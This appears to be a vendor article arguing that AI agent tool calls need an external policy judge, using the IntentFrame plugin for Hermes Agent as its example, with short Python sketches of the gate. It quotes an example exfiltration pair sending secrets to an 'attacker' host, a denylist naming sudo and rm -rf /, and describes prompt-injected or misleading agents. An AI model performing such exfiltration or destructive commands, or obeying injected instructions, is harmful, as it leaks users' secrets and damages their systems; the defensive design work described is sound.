Prompt guardrails and in-process allowlists fail when the model is wrong or hijacked. AI agent security needs an external judge that authorizes actions before they run.

Most teams building with AI agents start in the same place: system prompts, tool allowlists, human-in-the-loop approval for dangerous commands. That works until it doesn't — and when it fails, it fails silently.
The model doesn't need to "break out" of anything. It just needs to be wrong, tricked, or over-eager while holding tools that can run shell commands, write files, or schedule cron jobs. At that moment, the question isn't whether your prompt was good. It's whether anything outside the agent can stop the action before it runs.
That's the core of AI agent security: not better instructions, but structural separation between proposal and execution.
An agent "turns thought into effect" the moment it executes a tool. Every consequential tool call crosses a trust boundary:
User intent → Model reasoning → Tool call → Side effect on host/network/data

Most agent stacks treat security as a layer inside that pipeline: system prompts, tool allowlists, and human approval steps.
These controls share a fatal assumption: the agent process remains trustworthy. But the agent process is exactly what you're trying to constrain. It hosts the model, parses tool calls, and dispatches handlers. When the model is manipulated via prompt injection, confused by ambiguous instructions, or operating autonomously on a schedule, you're asking the same runtime that wanted the action to also veto it.
| Approach | Where rules live | Failure mode |
|---|---|---|
| Prompt-only | Model context | No enforcement at execution |
| In-process allowlists | Agent config | Same process can be bypassed or misconfigured |
| Human approval | Operator UI | Doesn't scale; often skipped under load |
| External policy runtime | Separate process | Agent proposes; judge authorizes independently |
AI agent security that holds up in production needs the last row: an external judge.
IntentFrame implements this pattern as validate-only governance:
You → Agent proposes an action → External policy runtime checks your rules
├─ ALLOW → action runs
└─ BLOCK → logged, never runs

Three properties matter:
This is the same architectural instinct behind OAuth, API gateways, and service meshes: authorization is not a feature of the caller; it's a gate the caller must pass through.
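The propose, check, ALLOW/BLOCK flow above can be sketched in a few lines. This is a minimal illustration, not IntentFrame's actual API: `ExternalJudge`, `ProposedAction`, and `run_if_allowed` are hypothetical names, and the judge here is an in-process stand-in for what would be a separate policy runtime.

```python
from dataclasses import dataclass, field
from enum import Enum


class Decision(Enum):
    ALLOW = "ALLOW"
    BLOCK = "BLOCK"


@dataclass
class ProposedAction:
    tool: str
    args: dict


@dataclass
class ExternalJudge:
    """Stand-in for a policy runtime that would live outside the agent process."""
    blocked_tools: set
    audit_log: list = field(default_factory=list)

    def authorize(self, action: ProposedAction) -> Decision:
        decision = Decision.BLOCK if action.tool in self.blocked_tools else Decision.ALLOW
        # The judge records every decision itself, independent of agent logging.
        self.audit_log.append((action.tool, decision.value))
        return decision


def run_if_allowed(judge: ExternalJudge, action: ProposedAction, handler):
    """Run the handler only when the judge returns ALLOW."""
    if judge.authorize(action) is Decision.ALLOW:
        return handler(**action.args)
    return None  # BLOCK: logged by the judge, never runs


# Demo with toy handlers that only record what they were asked to do.
judge = ExternalJudge(blocked_tools={"terminal"})
ran = []
result = run_if_allowed(
    judge,
    ProposedAction("write_file", {"path": "notes.txt"}),
    lambda path: ran.append(path) or "written",
)
blocked = run_if_allowed(
    judge,
    ProposedAction("terminal", {"command": "ls"}),
    lambda command: ran.append(command),
)
```

The point of the shape is that the handler is never reachable except through the judge's decision, and the audit record exists whether or not the action ran.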

Take Hermes Agent as a concrete example. Hermes ships serious safety features: command approval, allowlists, container isolation. Those run inside the Hermes stack.
IntentFrame doesn't replace Hermes. It adds an external checkpoint for the tools that can actually touch your machine:
| | Hermes alone | Hermes + IntentFrame |
|---|---|---|
| Where rules live | Prompts, config, allowlists inside Hermes | Policy YAML outside the agent |
| Who validates risky tools | The Hermes runtime | IntentFrame, before the action runs |
| If the model is tricked | Same process that wanted to act | External judge blocks + audit trail |
The integration governs Hermes's highest-risk tools by default: terminal, execute_code, write_file, patch, and cronjob. Reads like read_file stay ungoverned in v1 — a deliberate tradeoff, with an important caveat below.
Gating only the executor isn't enough. A serious AI agent security gate touches two surfaces:
| Layer | What it is | What the gate does |
|---|---|---|
| Schema | Tool spec shown to the model | Requires a reason field so the model explains intent |
| Executor | Function that runs the tool | Calls external validator; runs original handler only on ALLOW |
Patching only the executor means the model never supplies structured intent. Patching only the schema means you ask for reasons but never enforce them. You need both, every time.
The Hermes integration implements this as a plugin that wraps governed tool handlers: validate via a local adapter → strip reason → delegate to the untouched original handler on ALLOW.
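A rough sketch of the two-surface gate might look like the following. It assumes a JSON-Schema-style tool spec and a validator callable that returns the string "ALLOW" or a block message; `require_reason`, `govern`, and `demo_validate` are hypothetical names for illustration, not functions from Hermes or IntentFrame.

```python
import copy


def require_reason(schema: dict) -> dict:
    """Return a copy of a tool schema with a required 'reason' string parameter."""
    patched = copy.deepcopy(schema)
    params = patched.setdefault("parameters", {"type": "object"})
    params.setdefault("properties", {})["reason"] = {
        "type": "string",
        "description": "Why this call is needed.",
    }
    required = params.setdefault("required", [])
    if "reason" not in required:
        required.append("reason")
    return patched


def govern(tool_name, handler, validate):
    """Wrap a handler: validate first, strip reason, delegate only on ALLOW."""
    def governed(**kwargs):
        args = dict(kwargs)
        reason = args.pop("reason", None)  # the original handler never sees it
        if not reason:
            return {"status": "BLOCK", "detail": "missing reason"}
        verdict = validate(tool_name, args, reason)
        if verdict != "ALLOW":
            return {"status": "BLOCK", "detail": verdict}
        return {"status": "ALLOW", "result": handler(**args)}
    return governed


# Toy original handler and toy validator, both assumptions for the demo.
def write_file(path, content):
    return f"wrote {len(content)} bytes to {path}"


def demo_validate(tool, args, reason):
    return "BLOCK: protected path" if args["path"].startswith("/etc/") else "ALLOW"


schema = {
    "name": "write_file",
    "parameters": {
        "type": "object",
        "properties": {"path": {"type": "string"}, "content": {"type": "string"}},
        "required": ["path", "content"],
    },
}
patched_schema = require_reason(schema)
safe_write = govern("write_file", write_file, demo_validate)
```

Calling `safe_write(path="notes.txt", content="hi", reason="save notes")` reaches the original handler; omitting `reason` or targeting `/etc/` returns a BLOCK result without touching it.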
Blanket tool gating creates friction without proportional risk reduction. The right axis is:
"Changes state OR communicates externally."
| Govern | Leave in-process (usually) |
|---|---|
| Shell / code execution | Parsing, formatting, math |
| File writes, deletes | Internal read-only helpers |
| Cron / scheduled autonomy | Retrieval whose output stays in context |
| Outbound messaging, webhooks | |
Watch the exfiltration pairing:
read_file("secrets") → http_post("https://attacker/?data=...")

Neither call is a "write," but together they leak. AI agent security must govern outbound channels even when they aren't local mutations.
Select by tool name, not toolset. Hermes's file toolset mixes read_file (read) and write_file (write). Toolset-level filters are too coarse.
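Name-level selection can be as simple as a set lookup. In this sketch the governed names are the five listed earlier for the Hermes integration; `OUTBOUND_TOOLS` and the `http_post` entry are assumptions taken from the exfiltration example, and `is_governed` is a hypothetical helper.

```python
# Tools governed by default, as named earlier in this article.
GOVERNED_TOOLS = frozenset({"terminal", "execute_code", "write_file", "patch", "cronjob"})

# Assumption: outbound channels are listed separately so they are governed
# even though they do not mutate local state.
OUTBOUND_TOOLS = frozenset({"http_post"})


def is_governed(tool_name: str) -> bool:
    """Decide per tool name, never per toolset."""
    return tool_name in GOVERNED_TOOLS or tool_name in OUTBOUND_TOOLS


# A file toolset mixes a read and a write; only the write is selected.
file_toolset = ["read_file", "write_file"]
governed_in_toolset = [name for name in file_toolset if is_governed(name)]
```

A toolset-level filter would have to either govern both file tools or neither; the per-name check picks out `write_file` alone.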
External authorization isn't one check. IntentFrame runs a pipeline:
1. Deterministic rules: hard limits such as blocked commands (sudo, rm -rf /) and capability denylists
2. Semantic review: checks that the stated reason matches the actual operation, especially for ambiguous or high-impact actions

Deterministic rules catch obvious violations in milliseconds. Semantic review catches scope mismatches, like a user asking to "add a comment" to .bashrc when the patch would overwrite a privileged shell config file.
Both layers produce audit logs independent of the agent's own logging.
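To make the layering concrete, here is a small sketch of a two-stage check with its own audit log. The regex patterns, the action dictionary shape, and `toy_semantic_review` are all assumptions for illustration; a real semantic reviewer would be far more capable than this keyword check, and none of this reflects IntentFrame's internals.

```python
import re

# Assumed hard limits mirroring the examples in the text: sudo and rm -rf /.
HARD_LIMITS = [re.compile(r"\bsudo\b"), re.compile(r"\brm\s+-rf\s+/(\s|$)")]


def deterministic_check(command: str):
    """Return a violation message if any hard limit matches, else None."""
    for pattern in HARD_LIMITS:
        if pattern.search(command):
            return f"hard limit matched: {pattern.pattern}"
    return None


def toy_semantic_review(action: dict):
    """Placeholder reviewer: flags a 'comment' reason paired with an overwrite."""
    if "comment" in action.get("reason", "") and action.get("mode") == "overwrite":
        return "reason describes a small edit but the operation overwrites the file"
    return None


def authorize(action: dict, semantic_review, audit_log: list) -> str:
    """Run cheap deterministic rules first, then semantic review; log both outcomes."""
    violation = deterministic_check(action.get("command", ""))
    if violation is None:
        violation = semantic_review(action)
    decision = "BLOCK" if violation else "ALLOW"
    audit_log.append({"tool": action["tool"], "decision": decision, "detail": violation})
    return decision


log = []
d1 = authorize({"tool": "terminal", "command": "sudo apt install x", "reason": "install"},
               toy_semantic_review, log)
d2 = authorize({"tool": "patch", "path": ".bashrc", "mode": "overwrite",
                "reason": "add a comment"}, toy_semantic_review, log)
d3 = authorize({"tool": "terminal", "command": "ls -la", "reason": "list files"},
               toy_semantic_review, log)
```

Ordering the stages this way means the expensive review only runs on actions that already passed the hard limits, and every decision lands in a log the agent does not control.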

If you're evaluating AI agent security tooling, ask four questions:
Prompt engineering, RBAC on API keys, and sandboxing each solve adjacent problems. None replaces runtime authorization by an external judge.
IntentFrame's Hermes integration is the first shipped example of this pattern: a plugin gate, adapter sidecar, policy backend, and operator control plane — all outside Hermes's own process boundary.